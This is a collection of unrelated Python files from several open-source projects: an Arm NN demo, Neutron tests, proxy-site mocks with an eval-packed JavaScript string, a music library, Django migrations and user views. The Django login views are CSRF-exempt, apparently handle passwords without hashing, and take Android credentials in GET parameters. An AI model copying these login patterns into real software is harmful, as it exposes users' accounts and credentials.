if __name__ == '__main__':
    # Command-line entry point: parse demo options and run the capture loop.
    parser = ArgumentParser()
    parser.add_argument('--video_source', type=int, default=0,
                        help='Device index to access video stream. Defaults to primary device camera at index 0')
    parser.add_argument('--model_file_path', required=True, type=str,
                        help='Path to the Object Detection model to use')
    parser.add_argument('--model_name', required=True, type=str,
                        help='The name of the model being used. Accepted options: ssd_mobilenet_v1, yolo_v3_tiny')
    parser.add_argument('--label_path', required=True, type=str,
                        help='Path to the labelset for the provided model file')
    parser.add_argument('--preferred_backends', type=str, nargs='+', default=['CpuAcc', 'CpuRef'],
                        help='Takes the preferred backends in preference order, separated by whitespace, '
                             'for example: CpuAcc GpuAcc CpuRef. Accepted options: [CpuAcc, CpuRef, GpuAcc]. '
                             'Defaults to [CpuAcc, CpuRef]')
    args = parser.parse_args()
    main(args)
|
ARM-software/armnn
|
python/pyarmnn/examples/object_detection/run_video_stream.py
|
Python
|
mit
| 4,016
|
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
import mock
from neutron.common import config # noqa
from neutron import context as n_context
from oslo_config import cfg
from gbpservice.neutron.services.servicechain.plugins.ncp import model
from gbpservice.neutron.tests.unit.services.grouppolicy import (
test_resource_mapping as test_gp_driver)
from gbpservice.neutron.tests.unit.services.servicechain.ncp import (
test_ncp_plugin as base)
class TrafficStitchingPlumberTestCase(base.NodeCompositionPluginTestCase):
    """Tests service policy-target plumbing done by the stitching plumber."""

    def setUp(self):
        # Configure group-policy with the drivers/extensions the stitching
        # plumber relies on (resource mapping + proxy_group extension).
        cfg.CONF.set_override('policy_drivers', ['implicit_policy',
                                                 'resource_mapping'],
                              group='group_policy')
        cfg.CONF.set_override('allow_overlapping_ips', True)
        cfg.CONF.set_override(
            'extension_drivers', ['proxy_group'], group='group_policy')
        super(TrafficStitchingPlumberTestCase, self).setUp(
            node_drivers=['node_dummy'], node_plumber='stitching_plumber',
            core_plugin=test_gp_driver.CORE_PLUGIN)
        # Router rescheduling is irrelevant for these tests; stub it out.
        res = mock.patch('neutron.db.l3_db.L3_NAT_dbonly_mixin.'
                         '_check_router_needs_rescheduling').start()
        res.return_value = None
        # Grab the (only) node driver and mock its plumbing info per test.
        self.driver = self.sc_plugin.driver_manager.ordered_drivers[0].obj
        self.driver.get_plumbing_info = mock.Mock()
        self.driver.get_plumbing_info.return_value = {}

    def test_one_gateway_pt_prov_cons(self):
        """Gateway plumbing creates and later removes provider/consumer PTs."""
        context = n_context.get_admin_context()
        self.driver.get_plumbing_info.return_value = {
            'provider': [{}], 'consumer': [{}], 'plumbing_type': 'gateway'}
        provider, consumer, node = self._create_simple_chain()
        provider = self.show_policy_target_group(
            provider['id'])['policy_target_group']
        # Verify Service PT created and correctly placed
        targets = model.get_service_targets(context.session)
        self.assertEqual(2, len(targets))
        old_relationship = None
        for target in targets:
            self.assertEqual(node['id'], target.servicechain_node_id)
            pt = self.show_policy_target(
                target.policy_target_id)['policy_target']
            if target.relationship == 'provider':
                # Provider-side PT acts as the group default gateway.
                self.assertEqual(provider['id'],
                                 pt['policy_target_group_id'])
                self.assertTrue(pt['group_default_gateway'])
                self.assertFalse(pt['proxy_gateway'])
            else:
                # Consumer side a proxy group exists
                self.assertEqual(provider['proxy_group_id'],
                                 pt['policy_target_group_id'])
                self.assertFalse(pt['group_default_gateway'])
                self.assertTrue(pt['proxy_gateway'])
            # Exactly one provider and one consumer relationship expected.
            self.assertNotEqual(old_relationship, target.relationship)
            old_relationship = target.relationship
            port = self._get_object('ports', pt['port_id'], self.api)['port']
            self.assertTrue(port['name'].startswith('pt_service_target_'),
                            "Port name doesn't start with 'pt_service_target_"
                            "'.\nport:\n%s\n" % port)
        self.update_policy_target_group(
            provider['id'], provided_policy_rule_sets={})
        # With chain deletion, also the Service PTs are deleted
        new_targets = model.get_service_targets(context.session)
        self.assertEqual(0, len(new_targets))
        for target in targets:
            self.show_policy_target(
                target.policy_target_id, expected_res_status=404)
        provider = self.show_policy_target_group(
            provider['id'])['policy_target_group']
        self.assertIsNone(provider['proxy_group_id'])

    def test_ptg_delete(self):
        """PTG deletion with transparent plumbing service PTs present."""
        self.driver.get_plumbing_info.return_value = {
            'provider': [{}], 'consumer': [{}],
            'plumbing_type': 'transparent'}
        provider, _, _ = self._create_simple_service_chain()
        # Deleting a PTG will fail because of existing PTs
        # NOTE(review): the comment above contradicts the 204 (success)
        # status asserted below — confirm which behavior is the intended one.
        self.delete_policy_target_group(provider['id'],
                                        expected_res_status=204)
|
jiahaoliang/group-based-policy
|
gbpservice/neutron/tests/unit/services/servicechain/ncp/test_traffic_stitching_plumber.py
|
Python
|
apache-2.0
| 4,728
|
from httmock import urlmatch

# Expected parsed proxy lists (ip:port strings, in page order) for each of
# this module's mocked proxy-source pages.
free_proxy_expected = ['138.197.136.46:3128', '177.207.75.227:8080']
proxy_for_eu_expected = ['107.151.136.222:80', '37.187.253.39:8115']
rebro_weebly_expected = ['213.149.105.12:8080', '119.188.46.42:8080']
prem_expected = ['191.252.61.28:80', '167.114.203.141:8080', '152.251.141.93:8080']
sslproxy_expected = ['24.211.89.146:8080', '187.84.222.153:80', '41.193.238.249:8080']
@urlmatch(netloc=r'(.*\.)?sslproxies\.org$')
def sslproxy_mock(url, request):
    """httmock handler for sslproxies.org: static listing with 3 proxies."""
    return """<table class="table table-striped table-bordered" cellspacing="0" width="100%" id="proxylisttable">
    <thead>
    <tr>
    <th>IP Address</th>
    <th>Port</th>
    <th>Code</th>
    <th class='hm'>Country</th>
    <th>Anonymity</th>
    <th class='hm'>Google</th>
    <th class='hx'>Https</th>
    <th class='hm'>Last Checked</th>
    </tr>
    </thead>
    <tbody>
    <tr>
    <td>24.211.89.146</td>
    <td>8080</td>
    <td>US</td>
    <td class='hm'>United States</td>
    <td>elite proxy</td>
    <td class='hm'>no</td>
    <td class='hx'>yes</td>
    <td class='hm'>8 seconds ago</td>
    </tr>
    <tr>
    <td>187.84.222.153</td>
    <td>80</td>
    <td>BR</td>
    <td class='hm'>Brazil</td>
    <td>anonymous</td>
    <td class='hm'>no</td>
    <td class='hx'>yes</td>
    <td class='hm'>1 minute ago</td>
    </tr>
    <tr>
    <td>41.193.238.249</td>
    <td>8080</td>
    <td>ZA</td>
    <td class='hm'>South Africa</td>
    <td>elite proxy</td>
    <td class='hm'>no</td>
    <td class='hx'>yes</td>
    <td class='hm'>1 minute ago</td>
    </tr>
    </tbody>
    <tfoot>
    <tr>
    <th class="input"><input type="text" /></th>
    <th></th><th></th>
    <th class='hm'></th>
    <th></th>
    <th class='hm'></th>
    <th class='hx'></th>
    <th class='hm'></th>
    </tr>
    </tfoot>
    </table>
    """
@urlmatch(netloc=r'(.*\.)?free-proxy-list\.net$')
def free_proxy_mock(url, request):
    """httmock handler for free-proxy-list.net: static listing, 2 proxies."""
    return """<table border="0" cellpadding="0" cellspacing="0" id="proxylisttable"
    id="proxylisttable">\n
    <thead>\n
    <tr>\n
    <th>IP Address</th>
    \n
    <th>Port</th>
    \n
    <th>Code</th>
    \n
    <th>Country</th>
    \n
    <th>Anonymity</th>
    \n
    <th>Google</th>
    \n
    <th>Https</th>
    \n
    <th>Last Checked</th>
    \n
    </tr>
    \n
    </thead>
    \n
    <tbody>
    <tr>
    <td>138.197.136.46</td>
    <td>3128</td>
    <td>CA</td>
    <td>Canada</td>
    <td>anonymous</td>
    <td>no</td>
    <td>no</td>
    <td>7 seconds ago</td>
    </tr>
    \n
    <tr>
    <td>177.207.75.227</td>
    <td>8080</td>
    <td>BR</td>
    <td>Brazil</td>
    <td>transparent</td>
    <td>no</td>
    <td>no</td>
    <td>2 hours 21 minutes ago</td>
    </tr>
    \n
    </tbody>
    \n
    <tfoot>\n
    <tr>\n
    <th class="input"><input type="text"/></th>
    \n
    <th></th>
    \n
    <th></th>
    \n
    <th></th>
    \n
    <th></th>
    \n
    <th></th>
    \n
    <th></th>
    \n
    <th></th>
    \n
    </tr>
    \n
    </tfoot>
    \n
    </table>"""
@urlmatch(netloc=r'(.*\.)?proxyfor\.eu')
def proxy_for_eu_mock(url, request):
    """httmock handler for proxyfor.eu: static listing with 2 proxies."""
    return """<table class="proxy_list">
    <tr>
    <th>IP</th>
    <th>Port</th>
    <th>Country</th>
    <th>Anon</th>
    <th>Speed</th>
    <th> Check</th>
    <th>Cookie/POST</th>
    </tr>
    <tr>
    <td>107.151.136.222</td>
    <td>80</td>
    <td>United States</td>
    <td>HIGH</td>
    <td>1.643</td>
    <td>2016-04-12 17:02:43</td>
    <td>Yes/Yes</td>
    </tr>
    <tr>
    <td>37.187.253.39</td>
    <td>8115</td>
    <td>France</td>
    <td>HIGH</td>
    <td>12.779</td>
    <td>2016-04-12 14:36:18</td>
    <td>Yes/Yes</td>
    </tr>
    </table>"""
@urlmatch(netloc=r'(.*\.)?rebro\.weebly\.com$')
def rebro_weebly_mock(url, request):
    """httmock handler for rebro.weebly.com: IP:Port/Country/Status divs."""
    return """<div class="paragraph" style="text-align:left;"><strong><font color="#3ab890" size="3"><font
color="#d5d5d5">IP:Port</font></font></strong><br/><font
size="2"><strong><font color="#33a27f">213.149.105.12:8080<br/>119.188.46.42:8080</font></strong></font><br/><span></span>
</div>
<div class="paragraph" style="text-align:left;"><font size="2"><strong><font size="3"><font color="#3ab890">Country</font></font></strong></font><font size="2">
<br />Montenegro<br />China<br /></font><br /><span></span>
</div>
<div class="paragraph" style="text-align:left;"><font size="2"><strong><font color="#3ab890" size="3">Status</font></strong></font><br /><font size="2">
Elite & Anonymous<br />Elite & Anonymous<br /></font><br /><span></span>
</div>
"""
@urlmatch(netloc=r'(.*\.)?www\.premproxy\.com')
def prem_mock(url, request):
    """httmock handler for premproxy.com list page.

    Ports are hidden behind CSS class names (e.g. ``r60e6``) that the
    obfuscated script served by ``prem_js_mock`` resolves to numbers.
    """
    return """
<head>
<script src="/js/test.js"></script>
</head>
<div id="proxylist">\n
<tr class="anon">\n
<th><a href="/list/ip-address-01.htm" title="Proxy List sorted by ip address">IP address</a></th>
\n
<th><a href="/list/" title="Proxy List sorted by anonymity level">Anonymity</a></th>
\n
<th><a href="/list/time-01.htm" title="Proxy List sorted by updated time">Checked</a></th>
\n
<th><a href="/list/type-01.htm" title="Proxy list sorted by country">Country</a></th>
\n
<th><dfn title="City or State\\Region ">City</dfn></th>
\n
<th><dfn title="Internet Service Provider">ISP</dfn></th>
\n
</tr>
\n
<div id="navbar">
<ul class="pagination"><li class="active"><a href="/list/">1</a></li><li><a href="02.htm">2</a></li></ul>
</div>
\n
<tr class="anon">
<td data-label="IP:port "><span><input type="checkbox" name="proxyIp[]" value="191.252.61.28|r60e6"></span>191.252.61.28:<span class="r60e6"></span></td>
<td data-label="Anonymity Type: ">high-anonymous</td>
<td data-label="Checked: ">Apr-18, 17:18</td>
<td data-label="Country: ">Brazil</td>
<td data-label="City: ">S\xe3o Jos\xe9 Dos Campos</td>
<td data-label="ISP: "><dfn title="Locaweb Servi\xe7os de Internet S/A">Locaweb
Servi\xe7o...</dfn></td>
</tr>
\n
<tr class="anon">
<td data-label="IP:port "><span><input type="checkbox" name="proxyIp[]" value="167.114.203.141|r63c5"></span>167.114.203.141:<span class="r63c5"></span></td>
<td data-label="Anonymity Type: ">transparent</td>
<td data-label="Checked: ">Apr-18, 13:22</td>
<td data-label="Country: ">Canada</td>
<td data-label="City: ">Montr\xe9al (QC)</td>
<td data-label="ISP: ">OVH Hosting</td>
</tr>
\n
<tr class="anon">
<td data-label="IP:port "><span><input type="checkbox" name="proxyIp[]" value="152.251.141.93|r63c5"></span>152.251.141.93:<span class="r63c5"></span></td>
<td data-label="Anonymity Type: ">elite </td>
<td data-label="Checked: ">Jul-16, 04:39</td>
<td data-label="Country: ">Brazil</td>
<td data-label="City: "> </td>
<td data-label="ISP: ">Vivo</td>
</tr>
\n
<tr><td colspan="6"><span><input type="checkbox" name="" value="" onclick="checkAll(this)"></span>Select All Proxies</td></tr>
</div>"""
@urlmatch(netloc=r'(.*\.)?www\.premproxy\.com', path='/js/test.js', method='get', scheme='https')
def prem_js_mock(url, request):
    """httmock handler for premproxy.com's packed JS.

    Returns the eval-packed script that maps the CSS port-classes used by
    ``prem_mock`` (e.g. ``r60e6``) to real port numbers.
    """
    return b"eval(function(p,a,c,k,e,d){e=function(c){return(c<a?'':e(parseInt(c/a)))+((c=c%a)>35?String.fromCharCode(c+29):c.toString(36))};" \
           b"if(!''.replace(/^/,String)){while(c--){d[e(c)]=k[c]||e(c)}k=[function(e){return d[e]}];e=function(){return'\\\\w+'};c=1};" \
           b"while(c--){if(k[c]){p=p.replace(new RegExp('\\\\b'+e(c)+'\\\\b','g'),k[c])}}return p}('$(t).u(v(){$(\\'.s\\').0(r);" \
           b"$(\\'.n\\').0(o);$(\\'.p\\').0(q);$(\\'.w\\').0(x);$(\\'.D\\').0(E);$(\\'.F\\').0(C);$(\\'.B\\').0(y);$(\\'.z\\').0(A);" \
           b"$(\\'.m\\').0(i);$(\\'.7\\').0(8);$(\\'.9\\').0(6);$(\\'.4\\').0(1);$(\\'.2\\').0(5);$(\\'.3\\').0(a);$(\\'.l\\').0(b);" \
           b"$(\\'.j\\').0(k);$(\\'.h\\').0(g);$(\\'.c\\').0(d);$(\\'.e\\').0(f);$(\\'.G\\').0(1n);$(\\'.H\\').0(1b);$(\\'.1c\\').0(19);" \
           b"$(\\'.18\\').0(14);$(\\'.15\\').0(16);$(\\'.17\\').0(1d);$(\\'.1e\\').0(1k);$(\\'.1l\\').0(1m);$(\\'.1j\\').0(1i);$(\\'.1f\\').0(1g);" \
           b"$(\\'.1h\\').0(13);$(\\'.12\\').0(O);$(\\'.P\\').0(Q);$(\\'.N\\').0(M);$(\\'.I\\').0(J);$(\\'.K\\').0(L);$(\\'.R\\').0(S);$(\\'.Z\\').0(10)" \
           b";$(\\'.11\\').0(Y);$(\\'.X\\').0(T);$(\\'.U\\').0(V);$(\\'.W\\').0(1a)});',62,86,'html|20183|r97e1|rff0a|r117f|65103|65205|r76d3|52335|r21e1|" \
           b"62225|9000|r2e7b|81|r0d8a|9797|6666|r1f9b|28080|rdde2|31773|rf51a|rd687|r1c53|53281|raceb|3128|8080|r63c5|document|ready|function|r60e6|80|8888|" \
           b"r6ec1|8181|rb058|8197|r40ed|8081|re3f0|r28a8|r55d0|ra6df|8090|r4381|8000|53282|r125a|8082|r2f55|2016|r6714|47753|55012|rb59a|9090|ra346|r4b77|54214|" \
           b"rd762|1080|rc6d0|r9946|60088|9999|r3e10|8118|r7f82|r371f|54314|63909|41258|r8065|8380|rf914|r9e8e|8088|r3c82|808|r3165|8383|r6643|555|3130'.split('|'),0,{}))\n"
|
pgaref/HTTP_Request_Randomizer
|
tests/mocks.py
|
Python
|
mit
| 9,201
|
class Popup(object):
    """A transient on-screen notification with a limited lifespan.

    The popup counts its remaining lifespan down as :meth:`update` is
    called and reports via :attr:`is_alive` whether it should still be
    displayed.
    """

    def __init__(self, message, icon=None, colour=None, lifespan=2):
        self._message = message
        self._icon = icon
        self._colour = colour
        self._lifespan = lifespan

    @property
    def message(self):
        """Text shown in the popup."""
        return self._message

    @property
    def icon(self):
        """Optional icon identifier (None when absent)."""
        return self._icon

    @property
    def colour(self):
        """Optional display colour (None when absent)."""
        return self._colour

    @property
    def lifespan(self):
        """Remaining life; clamped at 0 once expired."""
        return self._lifespan

    def update(self, dt):
        """Advance time by *dt*, never letting the lifespan go negative."""
        if self._lifespan > 0:
            # max() clamps in one step instead of a follow-up if-check.
            self._lifespan = max(self._lifespan - dt, 0)

    @property
    def is_alive(self):
        """True while the popup still has lifespan left."""
        return self._lifespan > 0

    def __eq__(self, other):
        # Bug fix: comparing against a non-Popup used to raise
        # AttributeError; NotImplemented lets Python fall back sanely.
        if not isinstance(other, Popup):
            return NotImplemented
        return self.message == other.message

    def __ne__(self, other):
        # Keep != consistent with == (required on Python 2; harmless on 3).
        result = self.__eq__(other)
        if result is NotImplemented:
            return result
        return not result

    def __hash__(self):
        # Defining __eq__ alone makes instances unhashable on Python 3;
        # hash on the same key that equality uses.
        return hash(self._message)
|
kfcpaladin/sze-the-game
|
game/models/popups/Popup.py
|
Python
|
mit
| 803
|
../../../../share/pyshared/orca/script_utilities.py
|
Alberto-Beralix/Beralix
|
i386-squashfs-root/usr/lib/python2.7/dist-packages/orca/script_utilities.py
|
Python
|
gpl-3.0
| 51
|
"""
A simple numeric library for music computation.
This module is good for teaching, demonstrations, and quick hacks. To
generate actual music you should use the music module.
"""
from itertools import combinations, chain
from fractions import Fraction
def mod12(n):
    """Return the pitch class (0-11) of *n*."""
    remainder = n % 12
    return remainder
def interval(x, y):
    """Octave-reduced directed interval from *y* up to *x*."""
    difference = x - y
    return mod12(difference)
def interval_class(x, y):
    """The smaller of the two directed intervals between *x* and *y*."""
    up, down = interval(x, y), interval(y, x)
    return up if up < down else down
def intervals(notes):
    """Interval classes between each note and its successor."""
    successors = rotate(notes)[:-1]
    result = []
    for current, following in zip(notes, successors):
        result.append(interval_class(following, current))
    return result
def all_intervals(notes):
    """Sorted interval classes of every unordered pair of notes."""
    collected = []
    for pair in combinations(sorted(notes), 2):
        collected.extend(intervals(pair))
    return sorted(collected)
def transposition(notes, index):
    """Transpose every note by *index* semitones (mod 12)."""
    shifted = []
    for pitch in notes:
        shifted.append(mod12(pitch + index))
    return shifted
def transposition_startswith(notes, start):
    """Transpose *notes* so the first note becomes *start*."""
    shift = start - notes[0]
    return transposition(notes, shift)
def is_related_by_transposition(notes1, notes2):
    """True if some transposition of *notes1* equals a rotation of *notes2*."""
    candidates = [transposition(sorted(notes1), i) for i in range(0, 12)]
    for rotation in rotate_set(sorted(notes2)):
        if rotation in candidates:
            return True
    return False
def inversion(notes, index=0):
    """Invert *notes* around *index* (mod 12)."""
    inverted = []
    for pitch in notes:
        inverted.append(mod12(index - pitch))
    return inverted
def inversion_startswith(notes, start):
    """Invert *notes*, then transpose the result to start on *start*."""
    at_zero = transposition_startswith(notes, 0)
    return transposition_startswith(inversion(at_zero), start)
def inversion_first_note(notes):
    """Invert *notes* keeping the first note fixed."""
    return inversion(notes, notes[0] * 2)
def rotate(notes, n=1):
    """Rotate *notes* left by *n* positions (wrapping)."""
    cut = n % len(notes)
    return notes[cut:] + notes[:cut]
def rotate_set(notes):
    """All rotations of *notes*, starting with the identity."""
    return [rotate(notes, offset) for offset in range(len(notes))]
def retrograde(notes):
    """Return *notes* in reverse order as a new list."""
    backwards = list(notes)
    backwards.reverse()
    return backwards
def note_name(number):
    """Note name (sharp spelling) for pitch class *number*."""
    names = "C C# D D# E F F# G G# A A# B".split()
    return names[mod12(number)]
def notes_names(notes):
    """Note names for every pitch in *notes*."""
    return list(map(note_name, notes))
def accidentals(note_string):
    """Signed accidental count: sharps positive, flats negative, else 0."""
    count = len(note_string[1:])
    if "#" in note_string:
        return count
    if "b" in note_string:
        return -count
    return 0
def name_to_number(note_string):
    """Pitch class of a note name such as 'C#', 'eb' or 'G'."""
    scale = "C . D . E F . G . A . B".split()
    letter = note_string[0:1].upper()
    base = scale.index(letter)
    return mod12(base + accidentals(note_string))
def name_to_diatonic(note_string):
    """Diatonic degree (0-6) of the note letter, case-insensitive."""
    letters = "C D E F G A B".split()
    return letters.index(note_string[0:1].upper())
def note_duration(note_value, unity, tempo):
    """Seconds that *note_value* lasts at *tempo* beats (of *unity*) per minute."""
    beats_per_second = tempo * unity
    return (60.0 * note_value) / beats_per_second
def dotted_duration(duration, dots):
    """Duration lengthened by *dots* augmentation dots (each adds half again)."""
    half = Fraction(1, 2)
    # Geometric-series closed form: 1 + 1/2 + ... + (1/2)**dots.
    return duration * (1 - half ** (dots + 1)) / half
def durations(notes_values, unity, tempo):
    """note_duration applied to every value in *notes_values*."""
    return [note_duration(value, unity, tempo) for value in notes_values]
def get_quality(diatonic_interval, chromatic_interval):
    """Quality name for a (diatonic, chromatic) interval pair."""
    # Unisons, fourths and fifths form the "perfect" family.
    if diatonic_interval in (0, 3, 4):
        qualities = ["Diminished", "Perfect", "Augmented"]
    else:
        qualities = ['Diminished', 'Minor', 'Major', 'Augmented']
    # Chromatic size of the diminished version of each diatonic interval.
    anchors = [-1, 0, 2, 4, 6, 7, 9]
    try:
        offset = chromatic_interval - anchors[diatonic_interval]
        return qualities[offset]
    except IndexError as no_interval:
        raise Exception("Sorry, I can't deal with this interval") from no_interval
def interval_name(note1, note2):
    """Full interval name (e.g. 'Major Third') between two note names."""
    quantities = ["Unison", "Second", "Third", "Fourth", "Fifth", "Sixth", "Seventh"]
    first_num, second_num = name_to_number(note1), name_to_number(note2)
    first_deg, second_deg = name_to_diatonic(note1), name_to_diatonic(note2)
    chromatic = interval(second_num, first_num)
    diatonic = (second_deg - first_deg) % 7
    return "%s %s" % (get_quality(diatonic, chromatic), quantities[diatonic])
|
kroger/pyknon
|
pyknon/simplemusic.py
|
Python
|
mit
| 3,658
|
# -*- coding: utf-8 -*-
# Generated by Django 1.9 on 2015-12-30 06:34
from __future__ import unicode_literals
from django.conf import settings
from django.db import migrations, models
import django.db.models.deletion
class Migration(migrations.Migration):
    """Auto-generated (Django 1.9): add the Answer model and link users
    to problems through the existing ProblemMapping table."""
    dependencies = [
        ('core', '0007_auto_20151229_1804'),
    ]
    operations = [
        # Answer: a free-text value tied to a Problem and the answering user.
        migrations.CreateModel(
            name='Answer',
            fields=[
                ('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
                ('value', models.TextField()),
                ('problem', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='core.Problem')),
            ],
        ),
        migrations.AddField(
            model_name='user',
            name='problems',
            field=models.ManyToManyField(through='core.ProblemMapping', to='core.Problem'),
        ),
        # The reverse side of Answer.user points at the configured user model.
        migrations.AddField(
            model_name='answer',
            name='user',
            field=models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to=settings.AUTH_USER_MODEL),
        ),
    ]
|
patrickspencer/compass-python
|
webapp/apps/core/migrations/0008_auto_20151230_0634.py
|
Python
|
apache-2.0
| 1,139
|
from kwue.DB_functions.tag_db_functions import *
from django.views.decorators.csrf import csrf_exempt
from django.views.decorators.csrf import requires_csrf_token
from kwue.controllers.home import *
def get_user(req):
    """Return the requested user's profile data as a JSON response."""
    user_id = req.GET.dict()['user_id']
    record = db_retrieve_user(user_id)
    payload = ingredient_from_object_to_list(record)
    # Django model instances carry a non-serializable _state attribute.
    del payload['_state']
    payload['tag_list'] = return_tags(user_id, "User")
    payload['foods'] = db_get_user_foods(user_id)
    return HttpResponse(json.dumps(payload), content_type='application/json')
def get_user_profile_page(req):
    """Render the profile page for the session user, or an explicit user_id."""
    if req.session['user_id'] != -2:
        user_id = req.session['user_id']
    else:
        user_id = req.GET.dict()['user_id']
    record = db_retrieve_user(user_id)
    context = ingredient_from_object_to_list(record)
    # Strip the non-serializable Django model _state attribute.
    del context['_state']
    context['tag_list'] = return_tags(user_id, "User")
    return render(req, 'kwue/user_profile_page.html', context)
def update_diet_page(req):
    """Render the diet-update page for the logged-in user."""
    current_user = db_retrieve_user(req.session['user_id'])
    context = {'user_name': current_user.user_name}
    return render(req, 'kwue/update_diet.html', context)
def get_eating_preferences(req):
    """Return the eating preferences of the session user (or of an explicit
    ``user_id`` from the query string) as a JSON response."""
    # Bug fix: dict.has_key() was removed in Python 3; use `in` instead.
    if 'user_id' in req.session:
        user_id = req.session['user_id']
    else:
        user_id = req.GET.dict()['user_id']
    ep = db_retrieve_eating_preferences(user_id)
    return HttpResponse(json.dumps(ep), content_type='application/json')
@csrf_exempt
def update_eating_preferences(req):
    """Update a user's eating preferences and replace their wanted and
    unwanted ingredient lists from the posted form."""
    # Bug fix: dict.has_key() was removed in Python 3; use `in` instead.
    if 'user_id' in req.session:
        user_id = req.session['user_id']
    else:
        user_id = req.POST.dict()['user_id']
    ep = req.POST.dict()
    db_update_user_preferences(user_id, ep)
    user = db_retrieve_user(user_id)
    # Replace, rather than extend, the previous ingredient selections.
    user.unwanted_ingredients.clear()
    user.wanted_ingredients.clear()
    db_insert_user_unwanted_ing(user_id, json.loads(ep['unwanted_list']))
    db_insert_user_wanted_ing(user_id, json.loads(ep['wanted_list']))
    return HttpResponse(json.dumps({'is_success': True}), content_type='application/json')
@csrf_exempt
def sign_up(req):
    """Register a new user from the posted form, then show the login page."""
    form = req.POST.dict()
    # TODO: the email address is not yet checked for uniqueness.
    user_email_address = form['user_email_address']
    profile = dict(
        user_name=form["user_name"],
        user_nick=form["user_nick"],
        user_email_address=form["user_email_address"],
        user_password=form["user_password"],
        user_image=form["user_image"],
        user_type=form["user_type"]
    )
    db_insert_user(profile)
    return render(req, 'kwue/login.html', {'user_name': 'Guest'})
def signup_page(req):
    """Render the sign-up page for an anonymous visitor."""
    guest_context = {'user_name': 'Guest'}
    return render(req, 'kwue/signup.html', guest_context)
@csrf_exempt
def login(req):
    """Authenticate the posted credentials and start a session.

    On success renders the home page tailored to the user type; on
    failure falls back to the login page.
    """
    # Validate the user against the DB and start a session with its id.
    user_dict = req.POST.dict()
    user_email_address = user_dict['user_email_address']
    user_password = user_dict["user_password"]
    user = db_validate_user(user_email_address, user_password)
    if user:
        # Bug fix: the message used to print without spaces ("Userx@yexists").
        print("User " + user_email_address + " exists")
        req.session['user_id'] = user.user_id
        user_type = user.user_type
        user_id = user.user_id
        user_name = user.user_name
        user_image = user.user_image
        # NOTE(review): `is False` relies on user_type being a real bool --
        # confirm the model field type.
        if user_type is False:
            return render(req, 'kwue/home.html', {'recommendations': suggest(user_id), 'user_type': 0, 'user_name': user_name, 'user_id': user_id})
        else:
            return render(req, 'kwue/home.html', {'analysis_report': analyze(user_id), 'user_type': 1, 'user_name': user_name, 'user_image': user_image})
    else:
        # Bug fix: grammar ("does not exists" -> "does not exist").
        print("User does not exist.")
        return render(req, 'kwue/login.html', {'user_name': 'Guest'})
def get_login(req):
    """Render the login page for an anonymous visitor."""
    guest_context = {'user_name': 'Guest'}
    return render(req, 'kwue/login.html', guest_context)
def logout(req):
    """End the session and show the guest home page with all foods."""
    all_foods = db_retrieve_all_foods()
    # -2 is the sentinel used throughout this module for "not logged in".
    req.session['user_id'] = -2
    return render(req, 'kwue/home.html', {'recommendations': all_foods, 'user_type': 0, 'user_name': 'Guest'})
@csrf_exempt
@requires_csrf_token
def android_login(req):
    """Authenticate an Android client and answer with the user id as JSON."""
    credentials = req.GET.dict()
    user_email_address = credentials['user_email_address']
    user_password = credentials["user_password"]
    user = db_validate_user(user_email_address, user_password)
    if user:
        req.session['user_id'] = user.user_id
        body = {'user_id': user.user_id}
    else:
        # -2 marks an anonymous session.
        req.session['user_id'] = -2
        body = {'user_id': -2}
    return HttpResponse(json.dumps(body), content_type='application/json')
@csrf_exempt
@requires_csrf_token
def android_logout(req):
    """End an Android client session and acknowledge with JSON."""
    req.session['user_id'] = -2
    response_body = json.dumps({'is_success': True})
    return HttpResponse(response_body, content_type='application/json')
|
bounswe/bounswe2016group4
|
kwueBackend/kwue/controllers/user.py
|
Python
|
apache-2.0
| 5,045
|
# -*- coding: utf-8 -*-
from __future__ import unicode_literals
from django.db import migrations, models
class Migration(migrations.Migration):
    """Auto-generated: drop the unused ``status`` field from PredictDataset."""
    dependencies = [
        ('predict', '0010_predictdataset_delete_sources'),
    ]
    operations = [
        migrations.RemoveField(
            model_name='predictdataset',
            name='status',
        ),
    ]
|
IQSS/gentb-site
|
apps/predict/migrations/0011_remove_predictdataset_status.py
|
Python
|
agpl-3.0
| 371
|
"""
################################################################################
#
# SOAPpy - Cayce Ullman (cayce@actzero.com)
# Brian Matthews (blm@actzero.com)
# Gregory Warnes (gregory_r_warnes@groton.pfizer.com)
# Christopher Blunck (blunck@gst.com)
#
################################################################################
# Copyright (c) 2003, Pfizer
# Copyright (c) 2001, Cayce Ullman.
# Copyright (c) 2001, Brian Matthews.
#
# All rights reserved.
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions are met:
# Redistributions of source code must retain the above copyright notice, this
# list of conditions and the following disclaimer.
#
# Redistributions in binary form must reproduce the above copyright notice,
# this list of conditions and the following disclaimer in the documentation
# and/or other materials provided with the distribution.
#
# Neither the name of actzero, inc. nor the names of its contributors may
# be used to endorse or promote products derived from this software without
# specific prior written permission.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS"
# AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
# IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE
# ARE DISCLAIMED. IN NO EVENT SHALL THE REGENTS OR CONTRIBUTORS BE LIABLE FOR
# ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES
# (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES;
# LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND
# ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT
# (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS
# SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
#
################################################################################
"""
from __future__ import nested_scopes
